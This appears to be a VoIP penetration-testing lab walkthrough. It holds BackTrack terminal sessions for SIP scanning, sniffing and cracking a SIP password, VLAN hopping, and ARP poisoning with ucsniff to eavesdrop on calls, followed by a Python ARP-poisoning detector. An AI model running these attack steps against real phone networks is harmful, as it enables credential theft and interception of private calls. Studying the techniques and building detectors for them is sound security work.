Scanning and enumeration phase

root@bt:/pentest/voip/smap# ./smap -O 192.168.1.130
smap 0.6.0  mn@123.org http:/www.sitename.com
192.168.1.130 : ICMP reachable, SIP enabled
Best guess (55% sure) fingerprint:
	Asterisk PBX (unknown version)
	User Agent Asterisk PBX 1.6.0.15-FONCORE-r78
1  host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)


root@bt:/pentest/voip/smap# ./smap 192.168.1.104
smap 0.6.0  http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)


root@bt:/pentest/voip/smap# ./smap 192.168.1.130/24
smap 0.6.0  http://www.wormulon.net/
192.168.1.20: ICMP reachable, SIP enabled
192.168.1.22: ICMP reachable, SIP enabled
192.168.1.0: ICMP unreachable, SIP disabled
192.168.1.1: ICMP unreachable, SIP disabled
192.168.1.2: ICMP unreachable, SIP disabled
192.168.1.3: ICMP unreachable, SIP disabled
...fragment omitted...
192.168.1.250: ICMP unreachable, SIP disabled
192.168.1.251: ICMP unreachable, SIP disabled
192.168.1.252: ICMP unreachable, SIP disabled
192.168.1.253: ICMP unreachable, SIP disabled
192.168.1.254: ICMP unreachable, SIP disabled
192.168.1.255: ICMP unreachable, SIP disabled

256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%)


root@bt:/pentest/voip/smap# ./smap -O 192.168.1.104
smap 0.6.0  http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint:
  Asterisk PBX SVN-trunk-r56579
  User-Agent: Asterisk PBX

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

-----------------------------------------------------------------------------
Obtaining passwords

root@bt:/pentest/passwords/sipcrack# ./sipdump auth.txt -p auth.pcap
* Using pcap file auth.pcap for sniffing
* Starting to sniff with packet filter tcp or udp or vlan

* Dumped login from 192.168.1.130 -> 192.168.1.132 (User 100)
* Dumped login from 192.168.1.130 -> 192.168.1.132 (User 100)

* Exiting, sniffed 2 logins


root@bt:/pentest/passwords/sipcrack# ./sipcrack auth.txt -w wordlist.txt
* Found accounts
Num	Server		Client		User	Hash/Password
1	192.168.1.132	192.168.1.130	100	266985602b32305ac254d2087c...
2	192.168.1.132	192.168.1.130	100	5241a520b547852e2581b2323a...
3	192.168.1.132	192.168.1.130	100	e54b78d854126ba4587a4150b1...
Select which entry to crack (1 - 3): 1
* Generating static md5 hash... cae5479224126b852e2581
* Loaded wordlist: wordlist.txt
* Starting brute force against user 100 md5 (266985602b32305ac254d2087)
* Tried 48 passwords in 0 seconds
* Found password: 123
* Updating dump file auth.txt... done
--------------------------------------------------------------------------------

VLAN hopping


root@bt:~# voiphopper
voiphopper -i <interface> -c {0|1|2} -a -n -v <VLANID>
Please specify 1 base option mode:
CDP Sniff Mode (-c 0)
Example:  voiphopper -i eth0 -c 0
CDP Spoof Mode with custom packet (-c 1):
-D  (Device ID)
-P  (Port ID)
-C  (Capabilities)
-L  (Platform)
-S  (Software)
-U  (Duplex)
Example:  voiphopper -i eth0 -c 1 -D 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1
CDP Spoof Mode with pre-made packet (-c 2)
Example:  voiphopper -i eth0 -c 2
Avaya DHCP Option Mode (-a):
Example:  voiphopper -i eth0 -a
VLAN Hop Mode (-v VLAN ID):
Example:  voiphopper -i eth0 -v 200
Nortel DHCP Option Mode (-n):
Example:  voiphopper -i eth0 -n


root@bt:~# voiphopper -i eth0 -v 20
VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 20
Added VLAN 20 to Interface eth0
Attempting dhcp request for new interface eth0.20

eth0.20   Link encap:Ethernet  HWaddr 00:0c:29:84:98:b2
          inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:2274 (2.2 KB)
-----------------------------------------------------------------------------------

MAC address spoofing on the VoIP network


root@bt:~# nmap 192.168.1.132
Starting Nmap 5.51 ( http://nmap.org ) at 2013-08-06 14:28
Nmap scan report for 192.168.1.132
Host is up (0.000028s latency)
Not shown: 992 closed ports
PORT      STATE  SERVICE
135/tcp   open   msrpc
139/tcp   open   netbios-ssn
1433/tcp  open   ms-sql-s
9535/tcp  open   man
9593/tcp  open   cbas
9594/tcp  open   sgsys
9595/tcp  open   pds
MAC Address: 00:15:DB:10:D4:B0 (Intel Corporation)
Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds


root@bt:/pentest/voip/ucsniff 8.10# ucsniff -i eth0 -T
ucsniff 8.10 starting
Displaying the discovered targets list
Extension  Name    IP             Protocol
100        User A  192.168.1.132  sip
102        User B  192.168.1.133  sip
Please select one endpoint (1 - 2) from the discovered targets list
1
Target selected for input user eavesdropping.
100        User A  192.168.1.132  sip
Listening on eth0 ... (Ethernet)
eth0 -> 00:0c:28:F7:6d:71 192.168.1.133 255.255.255.0
Randomizing 255 hosts for scanning...
* |...................................................................................>| 100.00%
3 hosts added to the host list...
3 hosts saved to arpsaver.txt...
ARP poisoning victims
GROUP 1 : 192.168.1.132 00:15:DB:10:D4:B0
GROUP 2 : ANY (All of the hosts in the list)
Starting unified sniffing...
Warning: Please ensure you hit 'q' when you are finished with this program.
Warning: 'q' re-ARPs the victim. Failure to do so before program exit will result in DoS.
Listening for new calls to and from target User A (extension 100, IP 192.168.1.132)
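
The ucsniff session above works by poisoning the ARP caches of GROUP 1 and GROUP 2 and re-ARPing the victim when 'q' is pressed. The detector below is an added example, not one of the listings on this page: it flags an IP whose MAC binding changes and a single MAC that answers for several IPs, the two signatures that poisoning leaves on the wire. The ARP records are constructed; the MAC addresses are reused from the listings (00:15:DB:10:D4:B0 from the nmap output, 00:0c:29:84:98:b2 from the voiphopper ifconfig output).

```python
"""ARP-poisoning detector (added example). Flags an IP whose MAC binding
changes and a MAC that claims several IPs, the pattern ucsniff produces.
ARP_REPLIES below is constructed; the MACs are taken from this page."""
from collections import defaultdict

# Constructed ARP reply records: (seconds, sender IP, sender MAC).
# 00:15:db:10:d4:b0 is the phone seen in the nmap listing, 00:0c:29:84:98:b2
# the attacker's VM interface from the voiphopper listing.
ARP_REPLIES = [
    (0.0, "192.168.1.132", "00:15:db:10:d4:b0"),   # legitimate baseline
    (0.5, "192.168.1.133", "00:0c:28:f7:6d:71"),   # legitimate baseline
    (12.0, "192.168.1.132", "00:0c:29:84:98:b2"),  # poisoned (GROUP 1)
    (12.2, "192.168.1.133", "00:0c:29:84:98:b2"),  # poisoned (GROUP 2)
    (13.0, "192.168.1.132", "00:0c:29:84:98:b2"),  # re-sent, no new alert
    (60.0, "192.168.1.132", "00:15:db:10:d4:b0"),  # re-ARP on 'q' restores it
]


def detect_arp_poisoning(replies, trusted=None):
    """Return one alert per IP->MAC change. `trusted` may seed the baseline
    (e.g. from DHCP leases); otherwise the first binding seen is the baseline."""
    baseline = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    current = dict(baseline)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        if ip not in baseline:            # first sighting: learn, do not alert
            baseline[ip] = current[ip] = mac
            continue
        if current[ip] == mac:            # binding unchanged
            continue
        alerts.append({"time": ts, "ip": ip, "old_mac": current[ip],
                       "new_mac": mac, "restored": mac == baseline[ip]})
        current[ip] = mac
    return alerts


def macs_claiming_multiple_ips(replies):
    """Return {mac: {ips}} for MACs that answer for more than one IP."""
    claims = defaultdict(set)
    for _, ip, mac in replies:
        claims[mac.lower()].add(ip)
    return {mac: ips for mac, ips in claims.items() if len(ips) > 1}


if __name__ == "__main__":
    for a in detect_arp_poisoning(ARP_REPLIES):
        state = "restored" if a["restored"] else "POISONED"
        print(f"t={a['time']:5.1f} {a['ip']} {a['old_mac']} -> {a['new_mac']} {state}")
    for mac, ips in macs_claiming_multiple_ips(ARP_REPLIES).items():
        print(f"{mac} claims {sorted(ips)}")
```

On a real network the records would come from a packet capture or the switch's ARP inspection logs; seeding `trusted` from the DHCP lease table avoids learning a poisoned binding as the baseline.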

-------------------------------------------------------------------------------------------------
